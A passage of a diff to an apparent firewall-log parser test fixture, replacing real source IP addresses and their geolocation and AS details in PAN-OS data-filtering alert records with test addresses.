         "network.application": "web-browsing",
-        "network.community_id": "1:I0nRW7fXHKg0He8sWEMh90mqrd8=",
+        "network.community_id": "1:N/Bc1RgG30q1Owz0DWHR2yEwN44=",
         "network.direction": "outbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -7725,8 +7398,8 @@
         "panw.panos.virtual_sys": "vsys1",
         "related.ip": [
             "0.0.0.0",
-            "192.168.0.2",
-            "74.125.239.20"
+            "1.128.3.4",
+            "192.168.0.2"
         ],
         "related.user": [
             "picard"
@@ -7736,16 +7409,11 @@
         "server.port": 53809,
         "server.user.name": "picard",
         "service.type": "panw",
-        "source.address": "74.125.239.20",
-        "source.as.number": 15169,
-        "source.as.organization.name": "Google LLC",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
+        "source.address": "1.128.3.4",
+        "source.as.number": 1221,
+        "source.as.organization.name": "Telstra Pty Ltd",
         "source.geo.name": "United States",
-        "source.ip": "74.125.239.20",
+        "source.ip": "1.128.3.4",
         "source.port": 80,
         "tags": [
             "forwarded",
@@ -7754,7 +7422,7 @@
     },
     {
         "@timestamp": "2012-04-09T08:08:08.000-02:00",
-        "client.ip": "208.80.154.225",
+        "client.ip": "67.43.156.12",
         "client.port": 80,
         "destination.address": "192.168.0.2",
         "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -7770,7 +7438,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:08:08,208.80.154.225,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:13,24567,1,80,55912,0,0,0x200000,tcp,alert,\"Eadweard_Muybridge\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+        "event.original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:08:08,67.43.156.12,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:13,24567,1,80,55912,0,0,0x200000,tcp,alert,\"Eadweard_Muybridge\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -7782,9 +7450,9 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 32333,
+        "log.offset": 32215,
         "network.application": "web-browsing",
-        "network.community_id": "1:W08oA4XVHxagaCryNLen9OoTnPk=",
+        "network.community_id": "1:mSmmKo9krpIsh+2qFAZoA8nMDhg=",
         "network.direction": "outbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -7816,7 +7484,7 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "208.80.154.225"
+            "67.43.156.12"
         ],
         "related.user": [
             "picard"
@@ -7826,16 +7494,15 @@
         "server.port": 55912,
         "server.user.name": "picard",
         "service.type": "panw",
-        "source.address": "208.80.154.225",
-        "source.as.number": 14907,
-        "source.as.organization.name": "Wikimedia Foundation Inc.",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
+        "source.address": "67.43.156.12",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
         "source.geo.name": "United States",
-        "source.ip": "208.80.154.225",
+        "source.ip": "67.43.156.12",
         "source.port": 80,
         "tags": [
             "forwarded",
@@ -7844,7 +7511,7 @@
     },
     {
         "@timestamp": "2012-04-09T08:08:44.000-02:00",
-        "client.ip": "208.80.154.234",
+        "client.ip": "81.2.69.145",
         "client.port": 80,
         "destination.address": "192.168.0.2",
         "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -7860,7 +7527,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:08:44,208.80.154.234,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:49,24646,1,80,55916,0,0,0x200000,tcp,alert,\"load.php\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+        "event.original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:08:44,81.2.69.145,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:49,24646,1,80,55916,0,0,0x200000,tcp,alert,\"load.php\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -7873,9 +7540,9 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 32720,
+        "log.offset": 32600,
         "network.application": "web-browsing",
-        "network.community_id": "1:tvB7u/5+rW38IXXGXjbdYYdzJ5s=",
+        "network.community_id": "1:03rrdI/L+dbrLea/vrQULMTFqvU=",
         "network.direction": "outbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -7907,7 +7574,7 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "208.80.154.234"
+            "81.2.69.145"
         ],
         "related.user": [
             "picard"
@@ -7917,16 +7584,17 @@
         "server.port": 55916,
         "server.user.name": "picard",
         "service.type": "panw",
-        "source.address": "208.80.154.234",
-        "source.as.number": 14907,
-        "source.as.organization.name": "Wikimedia Foundation Inc.",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
+        "source.address": "81.2.69.145",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
         "source.geo.name": "United States",
-        "source.ip": "208.80.154.234",
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.145",
         "source.port": 80,
         "tags": [
             "forwarded",
@@ -7935,7 +7603,7 @@
     },
     {
         "@timestamp": "2012-04-09T08:16:57.000-02:00",
-        "client.ip": "65.54.75.25",
+        "client.ip": "67.43.156.14",
         "client.port": 80,
         "destination.address": "192.168.0.6",
         "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -7951,7 +7619,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:16:57,65.54.75.25,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:17:01,25874,1,80,1046,0,0,0x200000,tcp,reset-both,\"8fe44cb728c0f40750c64ee906eb72.css\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+        "event.original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:16:57,67.43.156.14,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:17:01,25874,1,80,1046,0,0,0x200000,tcp,reset-both,\"8fe44cb728c0f40750c64ee906eb72.css\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -7964,9 +7632,9 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 33097,
+        "log.offset": 32974,
         "network.application": "web-browsing",
-        "network.community_id": "1:LvKTW1EWi7nem/oAlX14Sg2W9kU=",
+        "network.community_id": "1:bJxw0tI76mNYOiv1ZJjBXdDpnTU=",
         "network.direction": "outbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -7998,7 +7666,7 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.6",
-            "65.54.75.25"
+            "67.43.156.14"
         ],
         "related.user": [
             "jordy"
@@ -8008,19 +7676,15 @@
         "server.port": 1046,
         "server.user.name": "jordy",
         "service.type": "panw",
-        "source.address": "65.54.75.25",
-        "source.as.number": 8075,
-        "source.as.organization.name": "Microsoft Corporation",
-        "source.geo.city_name": "Los Angeles",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 34.0544,
-        "source.geo.location.lon": -118.244,
+        "source.address": "67.43.156.14",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
         "source.geo.name": "United States",
-        "source.geo.region_iso_code": "US-CA",
-        "source.geo.region_name": "California",
-        "source.ip": "65.54.75.25",
+        "source.ip": "67.43.156.14",
         "source.port": 80,
         "tags": [
             "forwarded",
@@ -8029,7 +7693,7 @@
     },
     {
         "@timestamp": "2012-04-09T04:06:41.000-02:00",
-        "client.ip": "74.125.224.206",
+        "client.ip": "175.16.199.1",
         "client.port": 80,
         "destination.address": "192.168.0.2",
         "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -8045,7 +7709,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 04:06:41,74.125.224.206,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:06:46,2175,1,80,61734,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+        "event.original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 04:06:41,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:06:46,2175,1,80,61734,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -8057,9 +7721,9 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 33500,
+        "log.offset": 33378,
         "network.application": "google-maps",
-        "network.community_id": "1:Iur0h7DmmxbVfmJ8EKqn0v73b88=",
+        "network.community_id": "1:h4FhwHd9ztu4jpl3xgOaiB011a4=",
         "network.direction": "outbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -8090,8 +7754,8 @@
         "panw.panos.virtual_sys": "vsys1",
         "related.ip": [
             "0.0.0.0",
-            "192.168.0.2",
-            "74.125.224.206"
+            "175.16.199.1",
+            "192.168.0.2"
         ],
         "related.user": [
             "jordy"
@@ -8101,16 +7765,17 @@
         "server.port": 61734,
         "server.user.name": "jordy",
         "service.type": "panw",
-        "source.address": "74.125.224.206",
-        "source.as.number": 15169,
-        "source.as.organization.name": "Google LLC",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
+        "source.address": "175.16.199.1",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
         "source.geo.name": "United States",
-        "source.ip": "74.125.224.206",
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "source.port": 80,
         "tags": [
             "forwarded",
@@ -8119,7 +7784,7 @@
     },
     {
         "@timestamp": "2012-04-09T04:12:52.000-02:00",
-        "client.ip": "74.125.224.195",
+        "client.ip": "81.2.69.143",
         "client.port": 80,
         "destination.address": "192.168.0.2",
         "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -8135,7 +7800,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 04:12:52,74.125.224.195,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:12:57,3046,1,80,62292,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+        "event.original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 04:12:52,81.2.69.143,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:12:57,3046,1,80,62292,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -8147,9 +7812,9 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 33873,
+        "log.offset": 33749,
         "network.application": "google-maps",
-        "network.community_id": "1:n3f9RX9U3DOM57vpn8aB1QSo2Yw=",
+        "network.community_id": "1:dULQBKOE61wtZ1QM6GKohdrM1GE=",
         "network.direction": "outbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -8181,7 +7846,7 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "74.125.224.195"
+            "81.2.69.143"
         ],
         "related.user": [
             "jordy"
@@ -8191,16 +7856,17 @@
         "server.port": 62292,
         "server.user.name": "jordy",
         "service.type": "panw",
-        "source.address": "74.125.224.195",
-        "source.as.number": 15169,
-        "source.as.organization.name": "Google LLC",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
+        "source.address": "81.2.69.143",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
         "source.geo.name": "United States",
-        "source.ip": "74.125.224.195",
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "source.port": 80,
         "tags": [
             "forwarded",
@@ -8209,7 +7875,7 @@
     },
     {
         "@timestamp": "2012-04-09T06:07:49.000-02:00",
-        "client.ip": "207.178.96.34",
+        "client.ip": "67.43.156.12",
         "client.port": 80,
         "destination.address": "192.168.0.2",
         "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -8225,7 +7891,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:07:49,207.178.96.34,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,rss,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:07:54,1560,1,80,64669,0,0,0x200000,tcp,alert,\"appcast.xml\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+        "event.original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:07:49,67.43.156.12,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,rss,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:07:54,1560,1,80,64669,0,0,0x200000,tcp,alert,\"appcast.xml\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -8238,9 +7904,9 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 34246,
+        "log.offset": 34119,
         "network.application": "rss",
-        "network.community_id": "1:K6mY9EnrwYs1/a01d++OZ3kna2g=",
+        "network.community_id": "1:DLYH0WNYoXQ93i3rnp9QFsh63iM=",
         "network.direction": "outbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -8272,7 +7938,7 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "207.178.96.34"
+            "67.43.156.12"
         ],
         "related.user": [
             "jordy"
@@ -8282,19 +7948,15 @@
         "server.port": 64669,
         "server.user.name": "jordy",
         "service.type": "panw",
-        "source.address": "207.178.96.34",
-        "source.as.number": 20376,
-        "source.as.organization.name": "Hubris Communications",
-        "source.geo.city_name": "Liberal",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.0438,
-        "source.geo.location.lon": -100.9286,
+        "source.address": "67.43.156.12",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
         "source.geo.name": "United States",
-        "source.geo.region_iso_code": "US-KS",
-        "source.geo.region_name": "Kansas",
-        "source.ip": "207.178.96.34",
+        "source.ip": "67.43.156.12",
         "source.port": 80,
         "tags": [
             "forwarded",
@@ -8303,7 +7965,7 @@
     },
     {
         "@timestamp": "2012-04-09T06:48:44.000-02:00",
-        "client.ip": "74.125.224.195",
+        "client.ip": "81.2.69.143",
         "client.port": 80,
         "destination.address": "192.168.0.2",
         "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -8319,7 +7981,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:48:44,74.125.224.195,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:48:48,16852,1,80,65265,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+        "event.original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:48:44,81.2.69.143,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:48:48,16852,1,80,65265,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -8331,9 +7993,9 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 34614,
+        "log.offset": 34486,
         "network.application": "google-maps",
-        "network.community_id": "1:u89cWOeFF4sWlYYJHVB+nr6g6Qg=",
+        "network.community_id": "1:jorKmgA/OY669gtX62Fasc1iKGc=",
         "network.direction": "outbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -8365,7 +8027,7 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "74.125.224.195"
+            "81.2.69.143"
         ],
         "related.user": [
             "picard"
@@ -8375,16 +8037,17 @@
         "server.port": 65265,
         "server.user.name": "picard",
         "service.type": "panw",
-        "source.address": "74.125.224.195",
-        "source.as.number": 15169,
-        "source.as.organization.name": "Google LLC",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
+        "source.address": "81.2.69.143",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
         "source.geo.name": "United States",
-        "source.ip": "74.125.224.195",
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "source.port": 80,
         "tags": [
             "forwarded",
@@ -8393,7 +8056,7 @@
     },
     {
         "@timestamp": "2012-04-09T06:48:59.000-02:00",
-        "client.ip": "74.125.239.20",
+        "client.ip": "1.128.3.4",
         "client.port": 80,
         "destination.address": "192.168.0.2",
         "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -8409,7 +8072,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:48:59,74.125.239.20,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:49:05,15948,1,80,64979,0,0,0x200000,tcp,alert,\"csi\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+        "event.original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:48:59,1.128.3.4,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:49:05,15948,1,80,64979,0,0,0x200000,tcp,alert,\"csi\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -8421,9 +8084,9 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 34989,
+        "log.offset": 34858,
         "network.application": "web-browsing",
-        "network.community_id": "1:QmMWJ0pdk04yRgDj9m6OAKnXpDY=",
+        "network.community_id": "1:v/xhtv/qhJVgrOjMPvPqMWlrHXA=",
         "network.direction": "outbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -8454,8 +8117,8 @@
         "panw.panos.virtual_sys": "vsys1",
         "related.ip": [
             "0.0.0.0",
-            "192.168.0.2",
-            "74.125.239.20"
+            "1.128.3.4",
+            "192.168.0.2"
         ],
         "related.user": [
             "picard"
@@ -8465,16 +8128,11 @@
         "server.port": 64979,
         "server.user.name": "picard",
         "service.type": "panw",
-        "source.address": "74.125.239.20",
-        "source.as.number": 15169,
-        "source.as.organization.name": "Google LLC",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
+        "source.address": "1.128.3.4",
+        "source.as.number": 1221,
+        "source.as.organization.name": "Telstra Pty Ltd",
         "source.geo.name": "United States",
-        "source.ip": "74.125.239.20",
+        "source.ip": "1.128.3.4",
         "source.port": 80,
         "tags": [
             "forwarded",
@@ -8483,7 +8141,7 @@
     },
     {
         "@timestamp": "2012-04-09T06:50:14.000-02:00",
-        "client.ip": "66.152.109.24",
+        "client.ip": "81.2.69.193",
         "client.port": 80,
         "destination.address": "192.168.0.2",
         "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -8499,7 +8157,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:50:14,66.152.109.24,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:50:19,17028,1,80,49432,0,0,0x200000,tcp,alert,\"index.php\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+        "event.original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:50:14,81.2.69.193,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:50:19,17028,1,80,49432,0,0,0x200000,tcp,alert,\"index.php\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -8512,9 +8170,9 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 35360,
+        "log.offset": 35225,
         "network.application": "web-browsing",
-        "network.community_id": "1:d3Kvg96HWrCNAfAK3vx2Uqglkdo=",
+        "network.community_id": "1:lM6ErOc/Uj5ui7hk5LvnxpCB/K0=",
         "network.direction": "outbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -8546,7 +8204,7 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "66.152.109.24"
+            "81.2.69.193"
         ],
         "related.user": [
             "picard"
@@ -8556,19 +8214,17 @@
         "server.port": 49432,
         "server.user.name": "picard",
         "service.type": "panw",
-        "source.address": "66.152.109.24",
-        "source.as.number": 13536,
-        "source.as.organization.name": "First Light Fiber",
-        "source.geo.city_name": "Albany",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 42.7008,
-        "source.geo.location.lon": -73.8601,
+        "source.address": "81.2.69.193",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
         "source.geo.name": "United States",
-        "source.geo.region_iso_code": "US-NY",
-        "source.geo.region_name": "New York",
-        "source.ip": "66.152.109.24",
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.193",
         "source.port": 80,
         "tags": [
             "forwarded",
@@ -8577,7 +8233,7 @@
     },
     {
         "@timestamp": "2012-04-09T06:51:34.000-02:00",
-        "client.ip": "74.125.224.200",
+        "client.ip": "81.2.69.143",
         "client.port": 80,
         "destination.address": "192.168.0.2",
         "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -8593,7 +8249,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:51:34,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:51:39,15878,1,80,49722,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+        "event.original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:51:34,81.2.69.143,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:51:39,15878,1,80,49722,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -8605,9 +8261,9 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 35737,
+        "log.offset": 35600,
         "network.application": "google-maps",
-        "network.community_id": "1:+c2DVc+anjtRZ3iRsjbG51UM+JA=",
+        "network.community_id": "1:AFqpyz1JYwEsC+Bm2Q7fspI+r8Y=",
         "network.direction": "outbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -8639,7 +8295,7 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "74.125.224.200"
+            "81.2.69.143"
         ],
         "related.user": [
             "picard"
@@ -8649,16 +8305,17 @@
         "server.port": 49722,
         "server.user.name": "picard",
         "service.type": "panw",
-        "source.address": "74.125.224.200",
-        "source.as.number": 15169,
